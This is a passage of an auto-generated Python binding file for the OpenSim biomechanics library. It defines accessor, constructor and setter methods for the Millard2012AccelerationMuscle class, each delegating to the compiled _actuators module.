upd_ActiveForceLengthCurve(Millard2012AccelerationMuscle self) -> ActiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_ActiveForceLengthCurve(self, *args)
def set_ActiveForceLengthCurve(self, *args):
"""
set_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, int i, ActiveForceLengthCurve value)
Parameters
----------
i: int
value: OpenSim::ActiveForceLengthCurve const &
set_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, ActiveForceLengthCurve value)
Parameters
----------
value: OpenSim::ActiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_ActiveForceLengthCurve(self, *args)
def copyProperty_ForceVelocityCurve(self, source):
"""
copyProperty_ForceVelocityCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_ForceVelocityCurve(self, source)
def append_ForceVelocityCurve(self, value):
"""
append_ForceVelocityCurve(Millard2012AccelerationMuscle self, ForceVelocityCurve value) -> int
Parameters
----------
value: OpenSim::ForceVelocityCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_ForceVelocityCurve(self, value)
def constructProperty_ForceVelocityCurve(self, initValue):
"""
constructProperty_ForceVelocityCurve(Millard2012AccelerationMuscle self, ForceVelocityCurve initValue)
Parameters
----------
initValue: OpenSim::ForceVelocityCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_ForceVelocityCurve(self, initValue)
def get_ForceVelocityCurve(self, *args):
"""
get_ForceVelocityCurve(Millard2012AccelerationMuscle self, int i) -> ForceVelocityCurve
Parameters
----------
i: int
get_ForceVelocityCurve(Millard2012AccelerationMuscle self) -> ForceVelocityCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_ForceVelocityCurve(self, *args)
def upd_ForceVelocityCurve(self, *args):
"""
upd_ForceVelocityCurve(Millard2012AccelerationMuscle self, int i) -> ForceVelocityCurve
Parameters
----------
i: int
upd_ForceVelocityCurve(Millard2012AccelerationMuscle self) -> ForceVelocityCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_ForceVelocityCurve(self, *args)
def set_ForceVelocityCurve(self, *args):
"""
set_ForceVelocityCurve(Millard2012AccelerationMuscle self, int i, ForceVelocityCurve value)
Parameters
----------
i: int
value: OpenSim::ForceVelocityCurve const &
set_ForceVelocityCurve(Millard2012AccelerationMuscle self, ForceVelocityCurve value)
Parameters
----------
value: OpenSim::ForceVelocityCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_ForceVelocityCurve(self, *args)
def copyProperty_FiberForceLengthCurve(self, source):
"""
copyProperty_FiberForceLengthCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_FiberForceLengthCurve(self, source)
def append_FiberForceLengthCurve(self, value):
"""
append_FiberForceLengthCurve(Millard2012AccelerationMuscle self, FiberForceLengthCurve value) -> int
Parameters
----------
value: OpenSim::FiberForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_FiberForceLengthCurve(self, value)
def constructProperty_FiberForceLengthCurve(self, initValue):
"""
constructProperty_FiberForceLengthCurve(Millard2012AccelerationMuscle self, FiberForceLengthCurve initValue)
Parameters
----------
initValue: OpenSim::FiberForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_FiberForceLengthCurve(self, initValue)
def get_FiberForceLengthCurve(self, *args):
"""
get_FiberForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> FiberForceLengthCurve
Parameters
----------
i: int
get_FiberForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_FiberForceLengthCurve(self, *args)
def upd_FiberForceLengthCurve(self, *args):
"""
upd_FiberForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> FiberForceLengthCurve
Parameters
----------
i: int
upd_FiberForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_FiberForceLengthCurve(self, *args)
def set_FiberForceLengthCurve(self, *args):
"""
set_FiberForceLengthCurve(Millard2012AccelerationMuscle self, int i, FiberForceLengthCurve value)
Parameters
----------
i: int
value: OpenSim::FiberForceLengthCurve const &
set_FiberForceLengthCurve(Millard2012AccelerationMuscle self, FiberForceLengthCurve value)
Parameters
----------
value: OpenSim::FiberForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_FiberForceLengthCurve(self, *args)
def copyProperty_TendonForceLengthCurve(self, source):
"""
copyProperty_TendonForceLengthCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_TendonForceLengthCurve(self, source)
def append_TendonForceLengthCurve(self, value):
"""
append_TendonForceLengthCurve(Millard2012AccelerationMuscle self, TendonForceLengthCurve value) -> int
Parameters
----------
value: OpenSim::TendonForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_TendonForceLengthCurve(self, value)
def constructProperty_TendonForceLengthCurve(self, initValue):
"""
constructProperty_TendonForceLengthCurve(Millard2012AccelerationMuscle self, TendonForceLengthCurve initValue)
Parameters
----------
initValue: OpenSim::TendonForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_TendonForceLengthCurve(self, initValue)
def get_TendonForceLengthCurve(self, *args):
"""
get_TendonForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> TendonForceLengthCurve
Parameters
----------
i: int
get_TendonForceLengthCurve(Millard2012AccelerationMuscle self) -> TendonForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_TendonForceLengthCurve(self, *args)
def upd_TendonForceLengthCurve(self, *args):
"""
upd_TendonForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> TendonForceLengthCurve
Parameters
----------
i: int
upd_TendonForceLengthCurve(Millard2012AccelerationMuscle self) -> TendonForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_TendonForceLengthCurve(self, *args)
def set_TendonForceLengthCurve(self, *args):
"""
set_TendonForceLengthCurve(Millard2012AccelerationMuscle self, int i, TendonForceLengthCurve value)
Parameters
----------
i: int
value: OpenSim::TendonForceLengthCurve const &
set_TendonForceLengthCurve(Millard2012AccelerationMuscle self, TendonForceLengthCurve value)
Parameters
----------
value: OpenSim::TendonForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_TendonForceLengthCurve(self, *args)
def copyProperty_FiberCompressiveForceLengthCurve(self, source):
"""
copyProperty_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_FiberCompressiveForceLengthCurve(self, source)
def append_FiberCompressiveForceLengthCurve(self, value):
"""
append_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceLengthCurve value) -> int
Parameters
----------
value: OpenSim::FiberCompressiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_FiberCompressiveForceLengthCurve(self, value)
def constructProperty_FiberCompressiveForceLengthCurve(self, initValue):
"""
constructProperty_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceLengthCurve initValue)
Parameters
----------
initValue: OpenSim::FiberCompressiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_FiberCompressiveForceLengthCurve(self, initValue)
def get_FiberCompressiveForceLengthCurve(self, *args):
"""
get_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> FiberCompressiveForceLengthCurve
Parameters
----------
i: int
get_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_FiberCompressiveForceLengthCurve(self, *args)
def upd_FiberCompressiveForceLengthCurve(self, *args):
"""
upd_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> FiberCompressiveForceLengthCurve
Parameters
----------
i: int
upd_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_FiberCompressiveForceLengthCurve(self, *args)
def set_FiberCompressiveForceLengthCurve(self, *args):
"""
set_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, int i, FiberCompressiveForceLengthCurve value)
Parameters
----------
i: int
value: OpenSim::FiberCompressiveForceLengthCurve const &
set_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceLengthCurve value)
Parameters
----------
value: OpenSim::FiberCompressiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_FiberCompressiveForceLengthCurve(self, *args)
def copyProperty_FiberCompressiveForceCosPennationCurve(self, source):
"""
copyProperty_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_FiberCompressiveForceCosPennationCurve(self, source)
def append_FiberCompressiveForceCosPennationCurve(self, value):
"""
append_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceCosPennationCurve value) -> int
Parameters
----------
value: OpenSim::FiberCompressiveForceCosPennationCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_FiberCompressiveForceCosPennationCurve(self, value)
def constructProperty_FiberCompressiveForceCosPennationCurve(self, initValue):
"""
constructProperty_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceCosPennationCurve initValue)
Parameters
----------
initValue: OpenSim::FiberCompressiveForceCosPennationCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_FiberCompressiveForceCosPennationCurve(self, initValue)
def get_FiberCompressiveForceCosPennationCurve(self, *args):
"""
get_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, int i) -> FiberCompressiveForceCosPennationCurve
Parameters
----------
i: int
get_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceCosPennationCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_FiberCompressiveForceCosPennationCurve(self, *args)
def upd_FiberCompressiveForceCosPennationCurve(self, *args):
"""
upd_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, int i) -> FiberCompressiveForceCosPennationCurve
Parameters
----------
i: int
upd_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceCosPennationCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_FiberCompressiveForceCosPennationCurve(self, *args)
def set_FiberCompressiveForceCosPennationCurve(self, *args):
"""
set_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, int i, FiberCompressiveForceCosPennationCurve value)
Parameters
----------
i: int
value: OpenSim::FiberCompressiveForceCosPennationCurve const &
set_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceCosPennationCurve value)
Parameters
----------
value: OpenSim::FiberCompressiveForceCosPennationCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_FiberCompressiveForceCosPennationCurve(self, *args)
def copyProperty_fiber_damping(self, source):
"""
copyProperty_fiber_damping(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_fiber_damping(self, source)
def append_fiber_damping(self, value):
"""
append_fiber_damping(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_fiber_damping(self, value)
def constructProperty_fiber_damping(self, initValue):
"""
constructProperty_fiber_damping(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_fiber_damping(self, initValue)
def get_fiber_damping(self, *args):
"""
get_fiber_damping(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_fiber_damping(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_fiber_damping(self, *args)
def upd_fiber_damping(self, *args):
"""
upd_fiber_damping(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_fiber_damping(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_fiber_damping(self, *args)
def set_fiber_damping(self, *args):
"""
set_fiber_damping(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_fiber_damping(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_fiber_damping(self, *args)
def copyProperty_fiber_force_length_damping(self, source):
"""
copyProperty_fiber_force_length_damping(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_fiber_force_length_damping(self, source)
def append_fiber_force_length_damping(self, value):
"""
append_fiber_force_length_damping(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_fiber_force_length_damping(self, value)
def constructProperty_fiber_force_length_damping(self, initValue):
"""
constructProperty_fiber_force_length_damping(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_fiber_force_length_damping(self, initValue)
def get_fiber_force_length_damping(self, *args):
"""
get_fiber_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_fiber_force_length_damping(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_fiber_force_length_damping(self, *args)
def upd_fiber_force_length_damping(self, *args):
"""
upd_fiber_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_fiber_force_length_damping(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_fiber_force_length_damping(self, *args)
def set_fiber_force_length_damping(self, *args):
"""
set_fiber_force_length_damping(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_fiber_force_length_damping(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_fiber_force_length_damping(self, *args)
def copyProperty_fiber_compressive_force_length_damping(self, source):
"""
copyProperty_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_fiber_compressive_force_length_damping(self, source)
def append_fiber_compressive_force_length_damping(self, value):
"""
append_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_fiber_compressive_force_length_damping(self, value)
def constructProperty_fiber_compressive_force_length_damping(self, initValue):
"""
constructProperty_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_fiber_compressive_force_length_damping(self, initValue)
def get_fiber_compressive_force_length_damping(self, *args):
"""
get_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_fiber_compressive_force_length_damping(self, *args)
def upd_fiber_compressive_force_length_damping(self, *args):
"""
upd_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_fiber_compressive_force_length_damping(self, *args)
def set_fiber_compressive_force_length_damping(self, *args):
"""
set_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_fiber_compressive_force_length_damping(self, *args)
def copyProperty_fiber_compressive_force_cos_pennation_damping(self, source):
"""
copyProperty_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_fiber_compressive_force_cos_pennation_damping(self, source)
def append_fiber_compressive_force_cos_pennation_damping(self, value):
"""
append_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_fiber_compressive_force_cos_pennation_damping(self, value)
def constructProperty_fiber_compressive_force_cos_pennation_damping(self, initValue):
"""
constructProperty_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_fiber_compressive_force_cos_pennation_damping(self, initValue)
def get_fiber_compressive_force_cos_pennation_damping(self, *args):
"""
get_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_fiber_compressive_force_cos_pennation_damping(self, *args)
def upd_fiber_compressive_force_cos_pennation_damping(self, *args):
"""
upd_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_fiber_compressive_force_cos_pennation_damping(self, *args)
def set_fiber_compressive_force_cos_pennation_damping(self, *args):
"""
set_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_fiber_compressive_force_cos_pennation_damping(self, *args)
def copyProperty_tendon_force_length_damping(self, source):
"""
copyProperty_tendon_force_length_damping(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_tendon_force_length_damping(self, source)
def append_tendon_force_length_damping(self, value):
"""
append_tendon_force_length_damping(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_tendon_force_length_damping(self, value)
def constructProperty_tendon_force_length_damping(self, initValue):
"""
constructProperty_tendon_force_length_damping(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_tendon_force_length_damping(self, initValue)
def get_tendon_force_length_damping(self, *args):
"""
get_tendon_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_tendon_force_length_damping(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_tendon_force_length_damping(self, *args)
def upd_tendon_force_length_damping(self, *args):
"""
upd_tendon_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_tendon_force_length_damping(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_tendon_force_length_damping(self, *args)
def set_tendon_force_length_damping(self, *args):
"""
set_tendon_force_length_damping(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_tendon_force_length_damping(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_tendon_force_length_damping(self, *args)
def copyProperty_mass(self, source):
"""
copyProperty_mass(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_mass(self, source)
def append_mass(self, value):
"""
append_mass(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_mass(self, value)
def constructProperty_mass(self, initValue):
"""
constructProperty_mass(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_mass(self, initValue)
def get_mass(self, *args):
"""
get_mass(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_mass(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_mass(self, *args)
def upd_mass(self, *args):
"""
upd_mass(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_mass(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_mass(self, *args)
def set_mass(self, *args):
"""
set_mass(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_mass(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_mass(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::Millard2012AccelerationMuscle self) -> Millard2012AccelerationMuscle
__init__(OpenSim::Millard2012AccelerationMuscle self, std::string const & aName, double aMaxIsometricForce, double aOptimalFiberLength, double aTendonSlackLength, double aPennationAngle) -> Millard2012AccelerationMuscle
Parameters
----------
aName: std::string const &
aMaxIsometricForce: double
aOptimalFiberLength: double
aTendonSlackLength: double
aPennationAngle: double
"""
this = _actuators.new_Millard2012AccelerationMuscle(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def getFiberCompressiveForceLengthMultiplier(self, s):
"""
getFiberCompressiveForceLengthMultiplier(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State &
"""
return _actuators.Millard2012AccelerationMuscle_getFiberCompressiveForceLengthMultiplier(self, s)
def getFiberCompressiveForceCosPennationMultiplier(self, s):
"""
getFiberCompressiveForceCosPennationMultiplier(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State &
"""
return _actuators.Millard2012AccelerationMuscle_getFiberCompressiveForceCosPennationMultiplier(self, s)
def getTendonForceMultiplier(self, s):
"""
getTendonForceMultiplier(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State &
"""
return _actuators.Millard2012AccelerationMuscle_getTendonForceMultiplier(self, s)
def getMass(self):
"""
getMass(Millard2012AccelerationMuscle self) -> double
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getMass(self)
def getActivationModel(self):
"""
getActivationModel(Millard2012AccelerationMuscle self) -> MuscleFirstOrderActivationDynamicModel
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getActivationModel(self)
def getPennationModel(self):
"""
getPennationModel(Millard2012AccelerationMuscle self) -> MuscleFixedWidthPennationModel
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getPennationModel(self)
def getActiveForceLengthCurve(self):
"""
getActiveForceLengthCurve(Millard2012AccelerationMuscle self) -> ActiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getActiveForceLengthCurve(self)
def getForceVelocityCurve(self):
"""
getForceVelocityCurve(Millard2012AccelerationMuscle self) -> ForceVelocityCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getForceVelocityCurve(self)
def getFiberForceLengthCurve(self):
"""
getFiberForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getFiberForceLengthCurve(self)
def getTendonForceLengthCurve(self):
"""
getTendonForceLengthCurve(Millard2012AccelerationMuscle self) -> TendonForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getTendonForceLengthCurve(self)
def getFiberCompressiveForceLengthCurve(self):
"""
getFiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getFiberCompressiveForceLengthCurve(self)
def getFiberCompressiveForceCosPennationCurve(self):
"""
getFiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceCosPennationCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getFiberCompressiveForceCosPennationCurve(self)
def getFiberStiffnessAlongTendon(self, s):
"""
getFiberStiffnessAlongTendon(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.Millard2012AccelerationMuscle_getFiberStiffnessAlongTendon(self, s)
def setActivationModel(self, aActivationMdl):
"""
setActivationModel(Millard2012AccelerationMuscle self, MuscleFirstOrderActivationDynamicModel aActivationMdl)
Parameters
----------
aActivationMdl: OpenSim::MuscleFirstOrderActivationDynamicModel &
"""
return _actuators.Millard2012AccelerationMuscle_setActivationModel(self, aActivationMdl)
def setActiveForceLengthCurve(self, aActiveForceLengthCurve):
"""
setActiveForceLengthCurve(Millard2012AccelerationMuscle self, ActiveForceLengthCurve aActiveForceLengthCurve)
Parameters
----------
aActiveForceLengthCurve: OpenSim::ActiveForceLengthCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setActiveForceLengthCurve(self, aActiveForceLengthCurve)
def setForceVelocityCurve(self, aForceVelocityCurve):
"""
setForceVelocityCurve(Millard2012AccelerationMuscle self, ForceVelocityCurve aForceVelocityCurve)
Parameters
----------
aForceVelocityCurve: OpenSim::ForceVelocityCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setForceVelocityCurve(self, aForceVelocityCurve)
def setFiberForceLengthCurve(self, aFiberForceLengthCurve):
"""
setFiberForceLengthCurve(Millard2012AccelerationMuscle self, FiberForceLengthCurve aFiberForceLengthCurve)
Parameters
----------
aFiberForceLengthCurve: OpenSim::FiberForceLengthCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setFiberForceLengthCurve(self, aFiberForceLengthCurve)
def setTendonForceLengthCurve(self, aTendonForceLengthCurve):
"""
setTendonForceLengthCurve(Millard2012AccelerationMuscle self, TendonForceLengthCurve aTendonForceLengthCurve)
Parameters
----------
aTendonForceLengthCurve: OpenSim::TendonForceLengthCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setTendonForceLengthCurve(self, aTendonForceLengthCurve)
def setFiberCompressiveForceLengthCurve(self, aFiberCompressiveForceLengthCurve):
"""
setFiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceLengthCurve aFiberCompressiveForceLengthCurve)
Parameters
----------
aFiberCompressiveForceLengthCurve: OpenSim::FiberCompressiveForceLengthCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setFiberCompressiveForceLengthCurve(self, aFiberCompressiveForceLengthCurve)
